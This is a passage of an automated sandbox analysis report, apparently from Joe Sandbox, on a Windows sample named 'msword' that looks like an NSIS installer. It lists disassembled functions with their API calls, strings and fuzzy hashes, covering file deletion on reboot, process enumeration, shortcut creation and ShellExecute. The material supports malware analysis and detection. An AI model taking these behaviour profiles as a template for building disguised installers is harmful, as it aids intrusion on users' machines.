APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A
Delete: DeleteFile("%s"), xrefs: 00406DE8
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,74DF23A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406858
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406A7F

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Unknown, xrefs: 00406528
Process32FirstW, xrefs: 004065E9
Module32NextW, xrefs: 0040660A
Module32FirstW, xrefs: 004065FF
Process32NextW, xrefs: 004065F4
GetModuleBaseNameW, xrefs: 004064C0
EnumProcessModules, xrefs: 004064B6
PSAPI.DLL, xrefs: 00406490
EnumProcesses, xrefs: 004064AE
CreateToolhelp32Snapshot, xrefs: 004065E1
Kernel32.DLL, xrefs: 004065C7

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

F, xrefs: 004042D3
N, xrefs: 00404298
open, xrefs: 0040430B

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

^F, xrefs: 00406ACF
[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F
plF, xrefs: 00406B54
NUL, xrefs: 00406ACA

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

